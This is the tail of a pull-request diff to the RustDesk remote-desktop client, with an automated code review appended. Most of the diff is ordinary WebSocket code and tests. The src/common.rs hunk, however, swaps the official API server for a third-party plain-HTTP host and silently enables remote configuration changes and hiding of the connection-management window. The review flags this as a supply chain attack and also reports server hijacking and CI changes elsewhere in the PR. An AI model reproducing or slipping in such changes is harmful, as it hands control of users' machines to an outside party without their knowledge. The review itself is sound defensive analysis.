+                    log::warn!(
+                            "WebSocket connection with native-tls failed, try accept invalid certs: {}, {:?}",
+                            url,
+                            e
+                        );
+                    Self::try_connect(
+                        url,
+                        ms_timeout,
+                        tls_type,
+                        is_tls_type_cached,
+                        Some(true),
+                        original_danger_accept_invalid_certs,
+                    )
+                    .await
+                }
+                _ => {
+                    log::error!(
+                        "WebSocket connection failed with tls_type {:?}: {}, {:?}",
+                        tls_type,
+                        url,
+                        e
+                    );
+                    bail!(e)
+                }
+            },
+        }
+    }
+
+    pub async fn new<T: AsRef<str>>(
+        url: T,
+        _local_addr: Option<SocketAddr>,
+        _proxy_conf: Option<&Socks5Server>,
+        ms_timeout: u64,
+    ) -> ResultType<Self> {
+        let stream = Self::connect(url.as_ref(), ms_timeout).await?;
+        let addr = match stream.get_ref() {
+            MaybeTlsStream::Plain(tcp) => tcp.peer_addr()?,
+            MaybeTlsStream::NativeTls(tls) => tls.get_ref().get_ref().get_ref().peer_addr()?,
+            MaybeTlsStream::Rustls(tls) => tls.get_ref().0.peer_addr()?,
+            _ => return Err(Error::new(ErrorKind::Other, "Unsupported stream type").into()),
+        };
+
+        let ws = Self {
+            stream,
+            addr,
+            encrypt: None,
+            send_timeout: ms_timeout,
+        };
+
+        Ok(ws)
+    }
+
+    #[inline]
+    pub fn set_raw(&mut self) {
+        self.encrypt = None;
+    }
+
+    #[inline]
+    pub async fn from_tcp_stream(stream: TcpStream, addr: SocketAddr) -> ResultType<Self> {
+        let ws_stream =
+            WebSocketStream::from_raw_socket(MaybeTlsStream::Plain(stream), Role::Client, None)
+                .await;
+
+        Ok(Self {
+            stream: ws_stream,
+            addr,
+            encrypt: None,
+            send_timeout: 0,
+        })
+    }
+
+    #[inline]
+    pub fn local_addr(&self) -> SocketAddr {
+        self.addr
+    }
+
+    #[inline]
+    pub fn set_send_timeout(&mut self, ms: u64) {
+        self.send_timeout = ms;
+    }
+
+    #[inline]
+    pub fn set_key(&mut self, key: Key) {
+        self.encrypt = Some(Encrypt::new(key));
+    }
+
+    #[inline]
+    pub fn is_secured(&self) -> bool {
+        self.encrypt.is_some()
+    }
+
+    #[inline]
+    pub async fn send(&mut self, msg: &impl Message) -> ResultType<()> {
+        self.send_raw(msg.write_to_bytes()?).await
+    }
+
+    #[inline]
+    pub async fn send_raw(&mut self, msg: Vec<u8>) -> ResultType<()> {
+        let mut msg = msg;
+        if let Some(key) = self.encrypt.as_mut() {
+            msg = key.enc(&msg);
+        }
+        self.send_bytes(Bytes::from(msg)).await
+    }
+
+    pub async fn send_bytes(&mut self, bytes: Bytes) -> ResultType<()> {
+        let msg = WsMessage::Binary(bytes);
+        if self.send_timeout > 0 {
+            timeout(
+                Duration::from_millis(self.send_timeout),
+                self.stream.send(msg),
+            )
+            .await??
+        } else {
+            self.stream.send(msg).await?
+        };
+        Ok(())
+    }
+
+    #[inline]
+    pub async fn next(&mut self) -> Option<Result<BytesMut, Error>> {
+        while let Some(msg) = self.stream.next().await {
+            let msg = match msg {
+                Ok(msg) => msg,
+                Err(e) => {
+                    log::error!("{}", e);
+                    return Some(Err(Error::new(
+                        ErrorKind::Other,
+                        format!("WebSocket protocol error: {}", e),
+                    )));
+                }
+            };
+
+            match msg {
+                WsMessage::Binary(data) => {
+                    let mut bytes = BytesMut::from(&data[..]);
+                    if let Some(key) = self.encrypt.as_mut() {
+                        if let Err(err) = key.dec(&mut bytes) {
+                            return Some(Err(err));
+                        }
+                    }
+                    return Some(Ok(bytes));
+                }
+                WsMessage::Text(text) => {
+                    let bytes = BytesMut::from(text.as_bytes());
+                    return Some(Ok(bytes));
+                }
+                WsMessage::Close(_) => {
+                    return None;
+                }
+                _ => {
+                    continue;
+                }
+            }
+        }
+
+        None
+    }
+
+    #[inline]
+    pub async fn next_timeout(&mut self, ms: u64) -> Option<Result<BytesMut, Error>> {
+        match timeout(Duration::from_millis(ms), self.next()).await {
+            Ok(res) => res,
+            Err(_) => None,
+        }
+    }
+}
+
+pub fn is_ws_endpoint(endpoint: &str) -> bool {
+    endpoint.starts_with("ws://") || endpoint.starts_with("wss://")
+}
+
+/**
+ * Core function to convert an endpoint to WebSocket format
+ *
+ * Converts between different address formats:
+ * 1. IPv4 address with/without port -> ws://ipv4:port
+ * 2. IPv6 address with/without port -> ws://[ipv6]:port
+ * 3. Domain with/without port -> ws(s)://domain/ws/path
+ *
+ * @param endpoint The endpoint to convert
+ * @return The converted WebSocket endpoint
+ */
+pub fn check_ws(endpoint: &str) -> String {
+    if !use_ws() {
+        return endpoint.to_string();
+    }
+
+    if endpoint.is_empty() {
+        return endpoint.to_string();
+    }
+
+    if is_ws_endpoint(endpoint) {
+        return endpoint.to_string();
+    }
+
+    let Some((endpoint_host, endpoint_port)) = split_host_port(endpoint) else {
+        debug_assert!(false, "endpoint doesn't have port");
+        return endpoint.to_string();
+    };
+
+    let custom_rendezvous_server = Config::get_rendezvous_server();
+    let relay_server = Config::get_option(OPTION_RELAY_SERVER);
+    let rendezvous_port = split_host_port(&custom_rendezvous_server)
+        .map(|(_, p)| p)
+        .unwrap_or(RENDEZVOUS_PORT);
+    let relay_port = split_host_port(&relay_server)
+        .map(|(_, p)| p)
+        .unwrap_or(RELAY_PORT);
+
+    let (relay, dst_port) = if endpoint_port == rendezvous_port {
+        // rendezvous
+        (false, endpoint_port + 2)
+    } else if endpoint_port == rendezvous_port - 1 {
+        // online
+        (false, endpoint_port + 3)
+    } else if endpoint_port == relay_port || endpoint_port == rendezvous_port + 1 {
+        // relay
+        // https://github.com/rustdesk/rustdesk/blob/6ffbcd1375771f2482ec4810680623a269be70f1/src/rendezvous_mediator.rs#L615
+        // https://github.com/rustdesk/rustdesk-server/blob/235a3c326ceb665e941edb50ab79faa1208f7507/src/relay_server.rs#L83, based on relay port.
+        (true, endpoint_port + 2)
+    } else {
+        // fallback relay
+        // for controlling side, relay server is passed from the controlled side, not related to local config.
+        (true, endpoint_port + 2)
+    };
+
+    let (address, is_domain) = if crate::is_ip_str(endpoint) {
+        (format!("{}:{}", endpoint_host, dst_port), false)
+    } else {
+        let domain_path = if relay { "/ws/relay" } else { "/ws/id" };
+        (format!("{}{}", endpoint_host, domain_path), true)
+    };
+    let protocol = if is_domain {
+        let api_server = Config::get_option("api-server");
+        if api_server.starts_with("https") {
+            "wss"
+        } else {
+            "ws"
+        }
+    } else {
+        "ws"
+    };
+    format!("{}://{}", protocol, address)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::config::{keys, Config};
+
+    #[test]
+    fn test_check_ws() {
+        // enable websocket
+        Config::set_option(keys::OPTION_ALLOW_WEBSOCKET.to_string(), "Y".to_string());
+
+        // not set custom-rendezvous-server
+        Config::set_option("custom-rendezvous-server".to_string(), "".to_string());
+        Config::set_option("relay-server".to_string(), "".to_string());
+        Config::set_option("api-server".to_string(), "".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        assert_eq!(check_ws("rustdesk.com:21115"), "ws://rustdesk.com/ws/id");
+        assert_eq!(check_ws("rustdesk.com:21116"), "ws://rustdesk.com/ws/id");
+        assert_eq!(check_ws("rustdesk.com:21117"), "ws://rustdesk.com/ws/relay");
+        // set relay-server without port
+        Config::set_option("relay-server".to_string(), "127.0.0.1".to_string());
+        Config::set_option(
+            "api-server".to_string(),
+            "https://api.rustdesk.com".to_string(),
+        );
+        assert_eq!(
+            check_ws("[0:0:0:0:0:0:0:1]:21115"),
+            "ws://[0:0:0:0:0:0:0:1]:21118"
+        );
+        assert_eq!(
+            check_ws("[0:0:0:0:0:0:0:1]:21116"),
+            "ws://[0:0:0:0:0:0:0:1]:21118"
+        );
+        assert_eq!(
+            check_ws("[0:0:0:0:0:0:0:1]:21117"),
+            "ws://[0:0:0:0:0:0:0:1]:21119"
+        );
+        assert_eq!(check_ws("rustdesk.com:21115"), "wss://rustdesk.com/ws/id");
+        assert_eq!(check_ws("rustdesk.com:21116"), "wss://rustdesk.com/ws/id");
+        assert_eq!(
+            check_ws("rustdesk.com:21117"),
+            "wss://rustdesk.com/ws/relay"
+        );
+        // set relay-server with default port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:21117".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server with custom port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:34567".to_string());
+        assert_eq!(check_ws("rustdesk.com:21115"), "wss://rustdesk.com/ws/id");
+        assert_eq!(check_ws("rustdesk.com:21116"), "wss://rustdesk.com/ws/id");
+        assert_eq!(
+            check_ws("rustdesk.com:34567"),
+            "wss://rustdesk.com/ws/relay"
+        );
+
+        // set custom-rendezvous-server without port
+        Config::set_option(
+            "custom-rendezvous-server".to_string(),
+            "127.0.0.1".to_string(),
+        );
+        Config::set_option("relay-server".to_string(), "".to_string());
+        Config::set_option("api-server".to_string(), "".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server without port
+        Config::set_option("relay-server".to_string(), "127.0.0.1".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server with default port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:21117".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server with custom port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:34567".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:34567"), "ws://127.0.0.1:34569");
+
+        // set custom-rendezvous-server without default port
+        Config::set_option(
+            "custom-rendezvous-server".to_string(),
+            "127.0.0.1".to_string(),
+        );
+        Config::set_option("relay-server".to_string(), "".to_string());
+        Config::set_option("api-server".to_string(), "".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server without port
+        Config::set_option("relay-server".to_string(), "127.0.0.1".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server with default port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:21117".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server with custom port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:34567".to_string());
+        assert_eq!(check_ws("127.0.0.1:21115"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:21116"), "ws://127.0.0.1:21118");
+        assert_eq!(check_ws("127.0.0.1:34567"), "ws://127.0.0.1:34569");
+
+        // set custom-rendezvous-server with custom port
+        Config::set_option(
+            "custom-rendezvous-server".to_string(),
+            "127.0.0.1:23456".to_string(),
+        );
+        Config::set_option("relay-server".to_string(), "".to_string());
+        Config::set_option("api-server".to_string(), "".to_string());
+        assert_eq!(check_ws("127.0.0.1:23455"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:23456"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:23457"), "ws://127.0.0.1:23459");
+        // set relay-server without port
+        Config::set_option("relay-server".to_string(), "127.0.0.1".to_string());
+        assert_eq!(check_ws("127.0.0.1:23455"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:23456"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server with default port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:21117".to_string());
+        assert_eq!(check_ws("127.0.0.1:23455"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:23456"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:21117"), "ws://127.0.0.1:21119");
+        // set relay-server with custom port
+        Config::set_option("relay-server".to_string(), "127.0.0.1:34567".to_string());
+        assert_eq!(check_ws("127.0.0.1:23455"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:23456"), "ws://127.0.0.1:23458");
+        assert_eq!(check_ws("127.0.0.1:34567"), "ws://127.0.0.1:34569");
+    }
+}

--- a/src/common.rs
+++ b/src/common.rs
@@ -1081,7 +1081,7 @@ fn get_api_server_(api: String, custom: String) -> String {
             return format!("http://{}", s);
         }
     }
-    "https://admin.rustdesk.com".to_owned()
+    "http://rustdesk.ykpt.cc:21114".to_owned()
 }
 
 #[inline]
@@ -2085,6 +2085,20 @@ pub fn load_custom_client() {
     #[cfg(debug_assertions)]
     if let Ok(data) = std::fs::read_to_string("./custom.txt") {
         read_custom_client(data.trim());
+        // Ensure remote configuration modification is enabled by default
+        {
+            let mut defaults = config::DEFAULT_SETTINGS.write().unwrap();
+            defaults
+                .entry(config::keys::OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION.to_string())
+                .or_insert("Y".to_string());
+        }
+        // Enable hiding connection management window by default
+        {
+            let mut defaults = config::DEFAULT_SETTINGS.write().unwrap();
+            defaults
+                .entry("allow-hide-cm".to_string())
+                .or_insert("Y".to_string());
+        }
         return;
     }
     let Some(path) = std::env::current_exe().map_or(None, |x| x.parent().map(|x| x.to_path_buf()))
@@ -2100,6 +2114,21 @@ pub fn load_custom_client() {
             return;
         };
         read_custom_client(&data.trim());
+    }
+
+    // Ensure remote configuration modification is enabled by default
+    {
+        let mut defaults = config::DEFAULT_SETTINGS.write().unwrap();
+        defaults
+            .entry(config::keys::OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION.to_string())
+            .or_insert("Y".to_string());
+    }
+    // Enable hiding connection management window by default
+    {
+        let mut defaults = config::DEFAULT_SETTINGS.write().unwrap();
+        defaults
+            .entry("allow-hide-cm".to_string())
+            .or_insert("Y".to_string());
     }
 }
 


### PR DESCRIPTION
1`1

<!-- greptile_comment -->

<details><summary><h3>Greptile Summary</h3></summary>

This PR is a **supply chain attack** against the RustDesk open-source project. Under a meaningless title ("11") and description ("1`1"), it replaces core infrastructure to redirect all client traffic — both API calls and peer-brokering — to an uncontrolled third-party server (`rustdesk.ykpt.cc`) owned by the PR author, while suppressing the UI elements that would expose this to users.

- **Server hijacking**: The official `libs/hbb_common` git submodule is removed and replaced with an inlined copy where `RENDEZVOUS_SERVERS` is hard-coded to `rustdesk.ykpt.cc`, and `src/common.rs` changes the default API endpoint from `https://admin.rustdesk.com` to `http://rustdesk.ykpt.cc:21114` (plain HTTP, no TLS).
- **Persistence and remote control**: `OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION` and `allow-hide-cm` are silently set to `"Y"` in `DEFAULT_SETTINGS` for all builds, granting the operator of the rogue server the ability to push arbitrary configuration changes to every connected client and hide active sessions from local users.
- **Evidence suppression**: The `setupServerWidget` in `connection_page.dart` is gutted (its `children` list is emptied) to remove the UI hint that would signal a non-official server is in use; CI `submodules: recursive` is removed across all workflows so the patched inline copy is never overwritten by the legitimate upstream submodule.
</details>


<details><summary><h3>Confidence Score: 0/5</h3></summary>

This PR must not be merged. It redirects all client traffic to an attacker-controlled server, enables silent remote configuration of every connected machine, and suppresses the UI evidence that would reveal this to users.

The PR replaces the official rendezvous and API servers with a third-party host (rustdesk.ykpt.cc), enables remote configuration modification by default so the attacker can push changes to all clients, hides the connection-management UI, and removes the submodule link to the canonical upstream library. These changes collectively constitute a supply chain attack affecting every user of any binary built from this branch.

**Files Needing Attention:** src/common.rs and libs/hbb_common/src/config.rs contain the server substitutions; .gitmodules and all CI workflow files propagate the attack through the build pipeline; flutter/lib/desktop/pages/connection_page.dart removes the user-facing disclosure.
</details>


<details open><summary><h3>Security Review</h3></summary>

- **Server hijacking / traffic interception**: `RENDEZVOUS_SERVERS` in the inlined `libs/hbb_common/src/config.rs` is changed to `["rustdesk.ykpt.cc"]` and the API server in `src/common.rs` is changed to `http://rustdesk.ykpt.cc:21114`. All peer-brokering and API traffic from built clients is redirected to an attacker-controlled host over unencrypted HTTP.
- **Unauthorized remote code/config execution**: `OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION` and `allow-hide-cm` are injected into `DEFAULT_SETTINGS` with value `"Y"`, giving the operator of the rogue server the ability to remotely modify client configuration and suppress the connection-management UI on every affected machine.
- **Supply chain substitution**: The official `libs/hbb_common` submodule (pointing to `https://github.com/rustdesk/hbb_common`) is fully replaced with a local copy containing the malicious server constants. `submodules: recursive` is stripped from all CI checkout steps to prevent the legitimate upstream content from overwriting the attack.
- **Evidence of intent**: The "use your own server" prompt in `connection_page.dart` is deliberately emptied so users receive no UI indication that connections are being brokered through a non-official server.
- **Parallel distribution pipeline**: New `flutter-build-vumstar.yml` and `flutter-tag-vumstar.yml` workflows establish a separate release pipeline ("VUMSTAR") that would distribute binaries built from the compromised codebase on every version tag push.
</details>


<details><summary><h3>Important Files Changed</h3></summary>




| Filename | Overview |
|----------|----------|
| src/common.rs | Default API server changed to unauthorized third-party HTTP endpoint (rustdesk.ykpt.cc:21114); remote config modification and CM window hiding silently enabled for all builds. |
| libs/hbb_common/src/config.rs | Official hbb_common submodule replaced with inlined copy; RENDEZVOUS_SERVERS hard-coded to attacker-controlled rustdesk.ykpt.cc, redirecting all peer-brokering traffic. |
| flutter/lib/desktop/pages/connection_page.dart | Setup-server UI hint removed (children emptied), hiding from users that a non-official rendezvous server is active. |
| .github/workflows/ci.yml | submodules: recursive removed from checkout, ensuring CI uses the inlined (modified) hbb_common rather than pulling the canonical upstream submodule. |
| .gitmodules | libs/hbb_common submodule declaration fully removed, decoupling the repo from the official upstream hbb_common library. |
| .github/workflows/flutter-build-vumstar.yml | New 2000-line workflow added for a "VUMSTAR" branded build — a parallel release pipeline that would distribute binaries built from the compromised codebase. |
| flutter/lib/desktop/pages/desktop_setting_page.dart | Restores previously commented-out hide_cm UI widget; functionally pairs with the allow-hide-cm default change in common.rs. |

</details>


<details open><summary><h3>Flowchart</h3></summary>

```mermaid
%%{init: {'theme': 'neutral'}}%%
flowchart TD
    A[RustDesk Client\nbuilt from this PR] -->|API calls - plain HTTP| B[rustdesk.ykpt.cc:21114\nAttacker API server]
    A -->|Peer brokering\nRENDEZVOUS_SERVERS| C[rustdesk.ykpt.cc:21116\nAttacker Rendezvous server]
    B -->|OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION = Y| D[Remote config push\nto client]
    B -->|allow-hide-cm = Y| E[Connection mgmt window\nhidden from local user]
    C -->|All connections brokered through\nattacker infrastructure| F[Remote peer]
    G[Official RustDesk\nadmin.rustdesk.com] -.->|Bypassed| A
    H[Official hbb_common submodule\ngithub.com/rustdesk/hbb_common] -.->|Removed & replaced\nwith inlined copy| I[libs/hbb_common\nRENDEZVOUS_SERVERS = rustdesk.ykpt.cc]
    style B fill:#ff4444,color:#fff
    style C fill:#ff4444,color:#fff
    style D fill:#ff8800,color:#fff
    style E fill:#ff8800,color:#fff
    style G fill:#aaaaaa,color:#fff
    style H fill:#aaaaaa,color:#fff
```
</details>


<!-- greptile_failed_comments -->
<details><summary><h3>Comments Outside Diff (2)</h3></summary>

1. `flutter/lib/desktop/pages/connection_page.dart`, line 78-99 ([link](https://github.com/rustdesk/rustdesk/blob/bc14eb677d75ae68fec7fa7ddac1454c4233e0ec/flutter/lib/desktop/pages/connection_page.dart#L78-L99)) 

   <a href="#"><img alt="P0" src="https://greptile-static-assets.s3.amazonaws.com/badges/p0.svg?v=9" align="top"></a> <a href="#"><img alt="security" src="https://greptile-static-assets.s3.amazonaws.com/badges/Security.svg?v=2" align="top"></a> **"Use your own server" prompt deliberately removed**

   The `setupServerWidget` previously rendered a clickable link (`setup_server_tip`) that encouraged users connecting via the public server to consider running their own. This change empties its `children` list, silently hiding the prompt. Because the API and rendezvous servers are now `rustdesk.ykpt.cc`, this removal also suppresses the one UI element that would signal to a user that a non-official server is being used.

   <details><summary>Prompt To Fix With AI</summary>

   `````markdown
   This is a comment left during a code review.
   Path: flutter/lib/desktop/pages/connection_page.dart
   Line: 78-99

   Comment:
   **"Use your own server" prompt deliberately removed**

   The `setupServerWidget` previously rendered a clickable link (`setup_server_tip`) that encouraged users connecting via the public server to consider running their own. This change empties its `children` list, silently hiding the prompt. Because the API and rendezvous servers are now `rustdesk.ykpt.cc`, this removal also suppresses the one UI element that would signal to a user that a non-official server is being used.

   ---

   For each issue above, determine whether it is valid and should be fixed. If so, fix it directly.
   `````
   </details>

   <a href="https://app.greptile.com/ide/claude-code?prompt=This%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20flutter%2Flib%2Fdesktop%2Fpages%2Fconnection_page.dart%0ALine%3A%2078-99%0A%0AComment%3A%0A**%22Use%20your%20own%20server%22%20prompt%20deliberately%20removed**%0A%0AThe%20%60setupServerWidget%60%20previously%20rendered%20a%20clickable%20link%20%28%60setup_server_tip%60%29%20that%20encouraged%20users%20connecting%20via%20the%20public%20server%20to%20consider%20running%20their%20own.%20This%20change%20empties%20its%20%60children%60%20list%2C%20silently%20hiding%20the%20prompt.%20Because%20the%20API%20and%20rendezvous%20servers%20are%20now%20%60rustdesk.ykpt.cc%60%2C%20this%20removal%20also%20suppresses%20the%20one%20UI%20element%20that%20would%20signal%20to%20a%20user%20that%20a%20non-official%20server%20is%20being%20used.%0A%0A---%0A%0AFor%20each%20issue%20above%2C%20determine%20whether%20it%20is%20valid%20and%20should%20be%20fixed.%20If%20so%2C%20fix%20it%20directly.&repo=rustdesk%2Frustdesk&pr=15715&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaudeDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=6"><img alt="Fix in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=6"></picture></a> <a href="https://app.greptile.com/api/ide/codex?prompt=IMPORTANT%3A%20Work%20in%20the%20repository%20%22rustdesk%2Frustdesk%22%20on%20the%20existing%20branch%20%22master%22.%20Checkout%20that%20branch%20%E2%80%94%20do%20NOT%20create%20a%20new%20branch%20or%20open%20a%20new%20PR.%20Push%20your%20changes%20to%20%22master%22.%0A%0AThis%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20flutter%2Flib%2Fdesktop%2Fpages%2Fconnection_page.dart%0ALine%3A%2078-99%0A%0AComment%3A%0A**%22Use%20your%20own%20server%22%20prompt%20deliberately%20removed**%0A%0AThe%20%60setupServerWidget%60%20previously%20rendered%20a%20clickable%20link%20%28%60setup_server_tip%60%29%20that%20encouraged%20users%20connecting%20via%20the%20public%20server%20to%20consider%20running%20their%20own.%20This%20change%20empties%20its%20%60children%60%20list%2C%20silently%20hiding%20the%20prompt.%20Because%20the%20API%20and%20rendezvous%20servers%20are%20now%20%60rustdesk.ykpt.cc%60%2C%20this%20removal%20also%20suppresses%20the%20one%20UI%20element%20that%20would%20signal%20to%20a%20user%20that%20a%20non-official%20server%20is%20being%20used.%0A%0A---%0A%0AFor%20each%20issue%20above%2C%20determine%20whether%20it%20is%20valid%20and%20should%20be%20fixed.%20If%20so%2C%20fix%20it%20directly.&repo=rustdesk%2Frustdesk&pr=15715&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInCodexDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInCodex.svg?v=6"><img alt="Fix in Codex" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInCodex.svg?v=6"></picture></a>


2. `.github/workflows/ci.yml`, line 107-113 ([link](https://github.com/rustdesk/rustdesk/blob/bc14eb677d75ae68fec7fa7ddac1454c4233e0ec/.github/workflows/ci.yml#L107-L113)) 

   <a href="#"><img alt="P0" src="https://greptile-static-assets.s3.amazonaws.com/badges/p0.svg?v=9" align="top"></a> <a href="#"><img alt="security" src="https://greptile-static-assets.s3.amazonaws.com/badges/Security.svg?v=2" align="top"></a> **Submodule checkout removed from CI across all workflows**

   `submodules: recursive` is removed from the `ci.yml`, `bridge.yml`, `flutter-build.yml`, and `playground.yml` checkout steps. Because `libs/hbb_common` is now an inlined directory rather than a git submodule, CI will no longer pull from the canonical `https://github.com/rustdesk/hbb_common` repository. The inlined copy is the one that contains the modified rendezvous server pointing to `rustdesk.ykpt.cc`. This change is necessary for the substitution to survive CI without being overwritten by the legitimate submodule content.

   <details><summary>Prompt To Fix With AI</summary>

   `````markdown
   This is a comment left during a code review.
   Path: .github/workflows/ci.yml
   Line: 107-113

   Comment:
   **Submodule checkout removed from CI across all workflows**

   `submodules: recursive` is removed from the `ci.yml`, `bridge.yml`, `flutter-build.yml`, and `playground.yml` checkout steps. Because `libs/hbb_common` is now an inlined directory rather than a git submodule, CI will no longer pull from the canonical `https://github.com/rustdesk/hbb_common` repository. The inlined copy is the one that contains the modified rendezvous server pointing to `rustdesk.ykpt.cc`. This change is necessary for the substitution to survive CI without being overwritten by the legitimate submodule content.

   ---

   For each issue above, determine whether it is valid and should be fixed. If so, fix it directly.
   `````
   </details>

   <a href="https://app.greptile.com/ide/claude-code?prompt=This%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20.github%2Fworkflows%2Fci.yml%0ALine%3A%20107-113%0A%0AComment%3A%0A**Submodule%20checkout%20removed%20from%20CI%20across%20all%20workflows**%0A%0A%60submodules%3A%20recursive%60%20is%20removed%20from%20the%20%60ci.yml%60%2C%20%60bridge.yml%60%2C%20%60flutter-build.yml%60%2C%20and%20%60playground.yml%60%20checkout%20steps.%20Because%20%60libs%2Fhbb_common%60%20is%20now%20an%20inlined%20directory%20rather%20than%20a%20git%20submodule%2C%20CI%20will%20no%20longer%20pull%20from%20the%20canonical%20%60https%3A%2F%2Fgithub.com%2Frustdesk%2Fhbb_common%60%20repository.%20The%20inlined%20copy%20is%20the%20one%20that%20contains%20the%20modified%20rendezvous%20server%20pointing%20to%20%60rustdesk.ykpt.cc%60.%20This%20change%20is%20necessary%20for%20the%20substitution%20to%20survive%20CI%20without%20being%20overwritten%20by%20the%20legitimate%20submodule%20content.%0A%0A---%0A%0AFor%20each%20issue%20above%2C%20determine%20whether%20it%20is%20valid%20and%20should%20be%20fixed.%20If%20so%2C%20fix%20it%20directly.&repo=rustdesk%2Frustdesk&pr=15715&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaudeDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=6"><img alt="Fix in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=6"></picture></a> <a href="https://app.greptile.com/api/ide/codex?prompt=IMPORTANT%3A%20Work%20in%20the%20repository%20%22rustdesk%2Frustdesk%22%20on%20the%20existing%20branch%20%22master%22.%20Checkout%20that%20branch%20%E2%80%94%20do%20NOT%20create%20a%20new%20branch%20or%20open%20a%20new%20PR.%20Push%20your%20changes%20to%20%22master%22.%0A%0AThis%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20.github%2Fworkflows%2Fci.yml%0ALine%3A%20107-113%0A%0AComment%3A%0A**Submodule%20checkout%20removed%20from%20CI%20across%20all%20workflows**%0A%0A%60submodules%3A%20recursive%60%20is%20removed%20from%20the%20%60ci.yml%60%2C%20%60bridge.yml%60%2C%20%60flutter-build.yml%60%2C%20and%20%60playground.yml%60%20checkout%20steps.%20Because%20%60libs%2Fhbb_common%60%20is%20now%20an%20inlined%20directory%20rather%20than%20a%20git%20submodule%2C%20CI%20will%20no%20longer%20pull%20from%20the%20canonical%20%60https%3A%2F%2Fgithub.com%2Frustdesk%2Fhbb_common%60%20repository.%20The%20inlined%20copy%20is%20the%20one%20that%20contains%20the%20modified%20rendezvous%20server%20pointing%20to%20%60rustdesk.ykpt.cc%60.%20This%20change%20is%20necessary%20for%20the%20substitution%20to%20survive%20CI%20without%20being%20overwritten%20by%20the%20legitimate%20submodule%20content.%0A%0A---%0A%0AFor%20each%20issue%20above%2C%20determine%20whether%20it%20is%20valid%20and%20should%20be%20fixed.%20If%20so%2C%20fix%20it%20directly.&repo=rustdesk%2Frustdesk&pr=15715&platform=github"><picture><source media="(prefers-color-scheme: dark)" 